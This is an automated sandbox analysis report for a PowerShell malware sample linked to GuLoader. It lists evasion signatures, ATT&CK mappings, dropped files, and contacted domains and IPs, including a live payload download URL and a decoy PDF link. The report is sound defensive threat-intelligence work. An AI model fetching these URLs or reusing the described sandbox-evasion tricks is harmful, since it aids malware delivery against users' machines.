    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Users\Public\fcab.batProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exeProcess information set: NOOPENFILEERRORBOXJump to behavior

    Malware Analysis System Evasion

    barindex
    Opens the same file many times (likely Sandbox evasion)
    Source: C:\Users\Public\fcab.batFile opened: C:\Users\user\Videos\Tonishly\Unitten\Hyoscyamine.ini count: 49915Jump to behavior
    Tries to detect virtualization through RDTSC time measurements
    Source: C:\Users\Public\fcab.batRDTSC instruction interceptor: First address: 000000000822FB8C second address: 000000000822FB8C instructions: 0x00000000 rdtsc 0x00000002 cmp ebx, ecx 0x00000004 jc 00007F2D64ED80AAh 0x00000006 inc ebp 0x00000007 inc ebx 0x00000008 rdtsc
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 5812Thread sleep time: -7378697629483816s >= -30000sJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 9711Jump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information queried: ProcessInformationJump to behavior
    Source: C:\Users\Public\fcab.batCode function: 2_2_0040595A GetTempPathW,DeleteFileW,lstrcatW,lstrcatW,lstrlenW,FindFirstFileW,FindNextFileW,FindClose,2_2_0040595A
    Source: C:\Users\Public\fcab.batCode function: 2_2_0040658F FindFirstFileW,FindClose,2_2_0040658F
    Source: C:\Users\Public\fcab.batCode function: 2_2_00402862 FindFirstFileW,2_2_00402862
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
    Source: C:\Users\Public\fcab.batAPI call chain: ExitProcess graph end nodegraph_2-4942
    Source: C:\Users\Public\fcab.batAPI call chain: ExitProcess graph end nodegraph_2-4939
    Source: powershell.exe, 00000000.00000002.495073091.000001EA7EA67000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW
    Source: C:\Users\Public\fcab.batCode function: 2_2_10001B18 GlobalAlloc,lstrcpyW,lstrcpyW,GlobalFree,GlobalFree,GlobalFree,GlobalFree,GlobalFree,GlobalFree,lstrcpyW,GetModuleHandleW,LoadLibraryW,GetProcAddress,lstrlenW,2_2_10001B18
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: DebugJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Users\Public\fcab.bat "C:\Users\Public\fcab.bat" Jump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe" "C:\Users\user\Desktop\List of required items and services.pdfJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformationJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformationJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformationJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformationJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformationJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformationJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformationJump to behavior
    Source: C:\Users\Public\fcab.batCode function: 2_2_0040333D EntryPoint,SetErrorMode,GetVersion,lstrlenA,#17,OleInitialize,SHGetFileInfoW,GetCommandLineW,GetModuleHandleW,CharNextW,GetTempPathW,GetTempPathW,GetWindowsDirectoryW,lstrcatW,GetTempPathW,lstrcatW,SetEnvironmentVariableW,SetEnvironmentVariableW,SetEnvironmentVariableW,DeleteFileW,OleUninitialize,ExitProcess,lstrcatW,lstrcatW,lstrcatW,lstrcmpiW,SetCurrentDirectoryW,DeleteFileW,CopyFileW,CloseHandle,GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueW,AdjustTokenPrivileges,ExitWindowsEx,ExitProcess,2_2_0040333D

    Mitre Att&ck Matrix

    Initial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionExfiltrationCommand and ControlNetwork EffectsRemote Service EffectsImpact
    Valid Accounts1
    Native API    		11
    Registry Run Keys / Startup Folder    		1
    Access Token Manipulation    		121
    Masquerading    		1
    Input Capture    		11
    Security Software Discovery    		Remote Services1
    Input Capture    		Exfiltration Over Other Network Medium11
    Encrypted Channel    		Eavesdrop on Insecure Network CommunicationRemotely Track Device Without Authorization1
    System Shutdown/Reboot
    Default Accounts2
    PowerShell    		Boot or Logon Initialization Scripts11
    Process Injection    		121
    Virtualization/Sandbox Evasion    		LSASS Memory1
    Process Discovery    		Remote Desktop Protocol1
    Archive Collected Data    		Exfiltration Over Bluetooth1
    Ingress Tool Transfer    		Exploit SS7 to Redirect Phone Calls/SMSRemotely Wipe Data Without AuthorizationDevice Lockout
    Domain AccountsAt (Linux)Logon Script (Windows)11
    Registry Run Keys / Startup Folder    		1
    Access Token Manipulation    		Security Account Manager121
    Virtualization/Sandbox Evasion    		SMB/Windows Admin Shares1
    Clipboard Data    		Automated Exfiltration2
    Non-Application Layer Protocol    		Exploit SS7 to Track Device LocationObtain Device Cloud BackupsDelete Device Data
    Local AccountsAt (Windows)Logon Script (Mac)Logon Script (Mac)11
    Process Injection    		NTDS1
    Application Window Discovery    		Distributed Component Object ModelInput CaptureScheduled Transfer3
    Application Layer Protocol    		SIM Card SwapCarrier Billing Fraud
    Cloud AccountsCronNetwork Logon ScriptNetwork Logon Script1
    Obfuscated Files or Information    		LSA Secrets1
    Remote System Discovery    		SSHKeyloggingData Transfer Size LimitsFallback ChannelsManipulate Device CommunicationManipulate App Store Rankings or Ratings
    Replication Through Removable MediaLaunchdRc.commonRc.commonSteganographyCached Domain Credentials2
    File and Directory Discovery    		VNCGUI Input CaptureExfiltration Over C2 ChannelMultiband CommunicationJamming or Denial of ServiceAbuse Accessibility Features
    External Remote ServicesScheduled TaskStartup ItemsStartup ItemsCompile After DeliveryDCSync113
    System Information Discovery    		Windows Remote ManagementWeb Portal CaptureExfiltration Over Alternative ProtocolCommonly Used PortRogue Wi-Fi Access PointsData Encrypted for Impact

    Behavior Graph

    Hide Legend

    Legend:

    • Process
    • Signature
    • Created File
    • DNS/IP Info
    • Is Dropped
    • Is Windows Process
    • Number of created Registry Values
    • Number of created Files
    • Visual Basic
    • Delphi
    • Java
    • .Net C# or VB.NET
    • C, C++ or other language
    • Is malicious
    • Internet

    Screenshots

    Thumbnails

    This section contains all screenshots as thumbnails, including those not shown in the slideshow.


    windows-stand

    Antivirus, Machine Learning and Genetic Malware Detection

    Initial Sample

    SourceDetectionScannerLabelLink
    eua.ps111%ReversingLabsWin32.Trojan.Generic

    Dropped Files

    SourceDetectionScannerLabelLink
    C:\Users\Public\fcab.bat3%ReversingLabs
    C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\spilplatform\Thenceforth\Troubleshooting\Egueiite240\SharpDX.DXGI.dll0%ReversingLabs
    C:\Users\user\AppData\Local\Temp\nsjD2A6.tmp\System.dll0%ReversingLabs

    Unpacked PE Files

    No Antivirus matches

    Domains

    SourceDetectionScannerLabelLink
    dld.ae0%VirustotalBrowse

    URLs

    SourceDetectionScannerLabelLink
    http://pesterbdd.com/images/Pester.png0%URL Reputationsafe
    https://go.microsoft.co0%URL Reputationsafe
    https://go.micro0%URL Reputationsafe
    https://contoso.com/0%URL Reputationsafe
    https://contoso.com/License0%URL Reputationsafe
    https://contoso.com/Icon0%URL Reputationsafe
    http://www.blufwzmaxxlasfwzr.com/rh/List%20of%20rfwzquirfwzd%20itfwzms%20and%20sfwzrvicfwzs.pdf0%Avira URL Cloudsafe
    https://www.dld.ae/zp/zpeu.exe0%Avira URL Cloudsafe
    https://www.dld.ae0%Avira URL Cloudsafe
    http://www.oruddho.com0%Avira URL Cloudsafe
    http://www.bluemaxxlaser.com0%Avira URL Cloudsafe
    http://www.bluemaxxlaser.com/rh/List%20of%20required%20items%20and%20services.pdf0%Avira URL Cloudsafe

    Domains and IPs

    Contacted Domains

    NameIPActiveMaliciousAntivirus DetectionReputation
    dld.ae
    		84.16.234.51
    		truefalseunknown
    www.bluemaxxlaser.com
    		203.175.174.69
    		truefalse
      		unknown
      www.dld.ae
      		unknown
      		unknownfalse
        		unknown

        Contacted URLs

        NameMaliciousAntivirus DetectionReputation
        https://www.dld.ae/zp/zpeu.exefalse
        • Avira URL Cloud: safe
        		unknown
        http://www.bluemaxxlaser.com/rh/List%20of%20required%20items%20and%20services.pdffalse
        • Avira URL Cloud: safe
        		unknown

        URLs from Memory and Binaries

        NameSourceMaliciousAntivirus DetectionReputation
        http://www.blufwzmaxxlasfwzr.com/rh/List%20of%20rfwzquirfwzd%20itfwzms%20and%20sfwzrvicfwzs.pdfpowershell.exe, 00000000.00000003.385520918.000001EA7E8F7000.00000004.00000020.00020000.00000000.sdmptrue
        • Avira URL Cloud: safe
        		unknown
        http://nuget.org/NuGet.exepowershell.exe, 00000000.00000002.484779115.000001EA768F1000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.419761762.000001EA66A88000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.484779115.000001EA76A34000.00000004.00000800.00020000.00000000.sdmpfalse
          		high
          http://www.oruddho.comfcab.bat, 00000002.00000003.400335008.000000000283D000.00000004.00000020.00020000.00000000.sdmpfalse
          • Avira URL Cloud: safe
          		unknown
          http://pesterbdd.com/images/Pester.pngpowershell.exe, 00000000.00000002.419761762.000001EA66A88000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000003.385520918.000001EA7E8F4000.00000004.00000020.00020000.00000000.sdmptrue
          • URL Reputation: safe
          		unknown
          https://go.microsoft.copowershell.exe, 00000000.00000002.489529975.000001EA7E936000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000000.00000003.385520918.000001EA7E937000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000000.00000003.384414473.000001EA7E921000.00000004.00000020.00020000.00000000.sdmptrue
          • URL Reputation: safe
          		unknown
          http://www.apache.org/licenses/LICENSE-2.0.htmlpowershell.exe, 00000000.00000002.419761762.000001EA66A88000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000003.385520918.000001EA7E8F4000.00000004.00000020.00020000.00000000.sdmpfalse
            		high
            https://go.micropowershell.exe, 00000000.00000002.419761762.000001EA6835C000.00000004.00000800.00020000.00000000.sdmptrue
            • URL Reputation: safe
            		unknown
            http://www.bluemaxxlaser.compowershell.exe, 00000000.00000002.419761762.000001EA67986000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.419761762.000001EA67997000.00000004.00000800.00020000.00000000.sdmpfalse
            • Avira URL Cloud: safe
            		unknown
            https://contoso.com/powershell.exe, 00000000.00000002.484779115.000001EA76A34000.00000004.00000800.00020000.00000000.sdmpfalse
            • URL Reputation: safe
            		unknown
            https://nuget.org/nuget.exepowershell.exe, 00000000.00000002.484779115.000001EA768F1000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.419761762.000001EA66A88000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.484779115.000001EA76A34000.00000004.00000800.00020000.00000000.sdmpfalse
              		high
              https://contoso.com/Licensepowershell.exe, 00000000.00000002.484779115.000001EA76A34000.00000004.00000800.00020000.00000000.sdmpfalse
              • URL Reputation: safe
              		unknown
              https://contoso.com/Iconpowershell.exe, 00000000.00000002.484779115.000001EA76A34000.00000004.00000800.00020000.00000000.sdmpfalse
              • URL Reputation: safe
              		unknown
              http://nsis.sf.net/NSIS_ErrorErrorfcab.bat, 00000002.00000002.644827494.000000000040A000.00000004.00000001.01000000.0000000A.sdmpfalse
                		high
                http://schemas.xmlsoap.org/ws/2005/05/identity/claims/namepowershell.exe, 00000000.00000002.419761762.000001EA66881000.00000004.00000800.00020000.00000000.sdmpfalse
                  		high
                  https://github.com/Pester/Pesterpowershell.exe, 00000000.00000002.419761762.000001EA66A88000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000003.385520918.000001EA7E8F4000.00000004.00000020.00020000.00000000.sdmpfalse
                    		high
                    https://www.dld.aepowershell.exe, 00000000.00000002.419761762.000001EA67289000.00000004.00000800.00020000.00000000.sdmpfalse
                    • Avira URL Cloud: safe
                    		unknown

                    World Map of Contacted IPs

                    • No. of IPs < 25%
                    • 25% < No. of IPs < 50%
                    • 50% < No. of IPs < 75%
                    • 75% < No. of IPs

                    Public IPs

                    IPDomainCountryFlagASNASN NameMalicious
                    203.175.174.69
                    		www.bluemaxxlaser.comSingapore
                    		24482SGGS-AS-APSGGSSGfalse
                    84.16.234.51
                    		dld.aeGermany
                    		28753LEASEWEB-DE-FRA-10DEfalse

                    Private

                    IP
                    192.168.2.1

                    General Information

                    Joe Sandbox Version:37.1.0 Beryl
                    Analysis ID:879706
                    Start date and time:2023-06-01 12:13:06 +02:00
                    Joe Sandbox Product:CloudBasic
                    Overall analysis duration:0h 9m 43s
                    Hypervisor based Inspection enabled:false
                    Report type:full
                    Cookbook file name:default.jbs
                    Analysis system description:Windows 10 64 bit v1803 with Office Professional Plus 2016, Chrome 104, IE 11, Adobe Reader DC 19, Java 8 Update 211
                    Number of analysed new started processes analysed:9
                    Number of new started drivers analysed:0
                    Number of existing processes analysed:0
                    Number of existing drivers analysed:0
                    Number of injected processes analysed:0
                    Technologies:
                    • HCA enabled
                    • EGA enabled
                    • HDC enabled
                    • AMSI enabled
                    Analysis Mode:default
                    Analysis stop reason:Timeout
                    Sample file name:eua.ps1
                    Detection:MAL
                    Classification:mal68.troj.evad.winPS1@14/66@3/3
                    EGA Information:
                    • Successful, ratio: 50%
                    HDC Information:
                    • Successful, ratio: 62.2% (good quality ratio 60.7%)
                    • Quality average: 88.4%
                    • Quality standard deviation: 21.8%
                    HCA Information:
                    • Successful, ratio: 100%
                    • Number of executed functions: 66
                    • Number of non-executed functions: 32
                    Cookbook Comments:
                    • Found application associated with file extension: .ps1

                    Warnings

                    • Behavior information exceeds normal sizes, reducing to normal. Report will have missing behavior information.
                    • Exclude process from analysis (whitelisted): MpCmdRun.exe, audiodg.exe, WMIADAP.exe, conhost.exe
                    • Excluded IPs from analysis (whitelisted): 2.21.22.155, 2.21.22.179, 23.36.224.131
                    • Excluded domains from analysis (whitelisted): ssl.adobe.com.edgekey.net, armmf.adobe.com, acroipm2.adobe.com.edgesuite.net, e4578.dscb.akamaiedge.net, a122.dscd.akamai.net, acroipm2.adobe.com
                    • Execution Graph export aborted for target powershell.exe, PID 6096 because it is empty
                    • Not all processes where analyzed, report is missing behavior information
                    • Report size exceeded maximum capacity and may have missing behavior information.
                    • Report size getting too big, too many NtSetInformationFile calls found.

                    Simulations

                    Behavior and APIs

                    TimeTypeDescription
                    12:14:11API Interceptor44x Sleep call for process: powershell.exe modified
                    12:14:30API Interceptor1x Sleep call for process: RdrCEF.exe modified

                    Joe Sandbox View / Context

                    IPs

                    MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                    203.175.174.69zpeu.exeGet hashmaliciousGuLoaderBrowse
                    • bluemaxxlaser.com/rh/rheu.bin
                    as.ps1Get hashmaliciousGuLoaderBrowse
                    • www.bluemaxxlaser.com/rh/List%20of%20required%20items%20and%20services.pdf
                    84.16.234.51as.ps1Get hashmaliciousGuLoaderBrowse
                      RFQ - Scan36711006.exeGet hashmaliciousAgentTesla, zgRATBrowse

                        Domains

                        MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                        www.bluemaxxlaser.comas.ps1Get hashmaliciousGuLoaderBrowse
                        • 203.175.174.69

                        ASNs

                        MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                        SGGS-AS-APSGGSSGzpeu.exeGet hashmaliciousGuLoaderBrowse
                        • 203.175.174.69
                        as.ps1Get hashmaliciousGuLoaderBrowse
                        • 203.175.174.69
                        Fe7MaP3DNP.elfGet hashmaliciousMiraiBrowse
                        • 103.14.247.10
                        Demon.x86.elfGet hashmaliciousUnknownBrowse
                        • 103.14.247.55
                        tebjuOp0kK.elfGet hashmaliciousMiraiBrowse
                        • 103.14.247.35
                        7Hhy4dfkst.elfGet hashmaliciousMiraiBrowse
                        • 103.14.247.31
                        5HzazUnnF6.elfGet hashmaliciousMiraiBrowse
                        • 103.14.247.75
                        4M3ACl2k2v.elfGet hashmaliciousUnknownBrowse
                        • 103.14.247.47
                        wget.elfGet hashmaliciousUnknownBrowse
                        • 103.14.247.29
                        chB6z5L2GD.elfGet hashmaliciousMiraiBrowse
                        • 103.14.247.10
                        86iDRbpkXb.elfGet hashmaliciousMiraiBrowse
                        • 103.14.247.72
                        yC34ftIroi.elfGet hashmaliciousMiraiBrowse
                        • 103.14.247.68
                        http://singaporeoptometricassociation.com/Get hashmaliciousUnknownBrowse
                        • 203.175.162.79
                        PiuV0y8Fw8.elfGet hashmaliciousMiraiBrowse
                        • 103.14.247.49
                        BvZi2Dj3LS.elfGet hashmaliciousMiraiBrowse
                        • 103.14.247.26
                        q44S0kQ3wZ.exeGet hashmaliciousAgentTesla, VidarBrowse
                        • 203.175.174.68
                        SecuriteInfo.com.Win32.PWSX-gen.18409.25600.exeGet hashmaliciousAgentTeslaBrowse
                        • 203.175.168.182
                        #U260e#Ufe0f E-Fax-Invoice.htmGet hashmaliciousHTMLPhisherBrowse
                        • 203.175.162.6
                        https://faxcorporation1.od2.vtiger.com/pages/new_fax_receievedGet hashmaliciousHTMLPhisherBrowse
                        • 203.175.162.6
                        aJF1hL1hAJ.dllGet hashmaliciousWannacryBrowse
                        • 124.6.37.129

                        JA3 Fingerprints

                        MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                        54328bd36c14bd82ddaa0c04b25ed9adas.ps1Get hashmaliciousGuLoaderBrowse
                        • 84.16.234.51
                        file.exeGet hashmaliciousUnknownBrowse
                        • 84.16.234.51
                        file.exeGet hashmaliciousUnknownBrowse
                        • 84.16.234.51
                        Cobro_Juridico_Historial_de_pago.vbsGet hashmaliciousNjrat, PasteDownloaderBrowse
                        • 84.16.234.51
                        PO20230247.xla.xlsxGet hashmaliciousUnknownBrowse
                        • 84.16.234.51
                        file.ps1Get hashmaliciousUnknownBrowse
                        • 84.16.234.51
                        main.ps1Get hashmaliciousKDOT TOKEN GRABBERBrowse
                        • 84.16.234.51
                        AEJR1569.jsGet hashmaliciousNetSupport RATBrowse
                        • 84.16.234.51
                        https://docs.google.com/drawings/d/1yyXXrwkMe93YDIykPC-d3JWZ3X37agPJMgGC3eIiv0w/previewGet hashmaliciousHTMLPhisherBrowse
                        • 84.16.234.51
                        npp.8.5.3.Installer.x64342423423423424242423423424.batGet hashmaliciousUnknownBrowse
                        • 84.16.234.51
                        Pagamento.jsGet hashmaliciousClipboard Hijacker, QuasarBrowse
                        • 84.16.234.51
                        rBillofLading05-25-2023.exeGet hashmaliciousAveMariaBrowse
                        • 84.16.234.51
                        SCAN_DOC_003930_doc.exeGet hashmaliciousUnknownBrowse
                        • 84.16.234.51
                        02705399.exeGet hashmaliciousUnknownBrowse
                        • 84.16.234.51
                        02705399.exeGet hashmaliciousUnknownBrowse
                        • 84.16.234.51
                        HIOY0568.jsGet hashmaliciousUnknownBrowse
                        • 84.16.234.51
                        Voucher_Booking_Reservation_Detail_09888846348.vbsGet hashmaliciousAsyncRATBrowse
                        • 84.16.234.51
                        06472899.jsGet hashmaliciousUnknownBrowse
                        • 84.16.234.51
                        file.jsGet hashmaliciousUnknownBrowse
                        • 84.16.234.51
                        file.jsGet hashmaliciousUnknownBrowse
                        • 84.16.234.51

                        Dropped Files

                        MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                        C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\spilplatform\Thenceforth\Troubleshooting\Egueiite240\SharpDX.DXGI.dllzpeu.exeGet hashmaliciousGuLoaderBrowse
                          zpeu.exeGet hashmaliciousGuLoaderBrowse
                            as.ps1Get hashmaliciousGuLoaderBrowse
                              KwP6qU3cQ8.exeGet hashmaliciousFormBook, GuLoaderBrowse
                                KwP6qU3cQ8.exeGet hashmaliciousGuLoaderBrowse
                                  DB948GHBNJI.xlsxGet hashmaliciousGuLoaderBrowse
                                    Order-new world foods.xlsxGet hashmaliciousGuLoaderBrowse
                                      8cAZneRN6B.exeGet hashmaliciousFormBook, GuLoaderBrowse
                                        8cAZneRN6B.exeGet hashmaliciousGuLoaderBrowse
                                          fr34veeTGm.exeGet hashmaliciousFormBook, GuLoaderBrowse
                                            fr34veeTGm.exeGet hashmaliciousGuLoaderBrowse
                                              ShipmentReceipt9521368040.xlsxGet hashmaliciousGuLoaderBrowse
                                                njUIPPVrud.exeGet hashmaliciousFormBook, GuLoaderBrowse
                                                  njUIPPVrud.exeGet hashmaliciousGuLoaderBrowse
                                                    ShipmentReceipt93213628045.xlsxGet hashmaliciousGuLoaderBrowse

                                                      Created / dropped Files

                                                      C:\Users\Public\fcab.bat

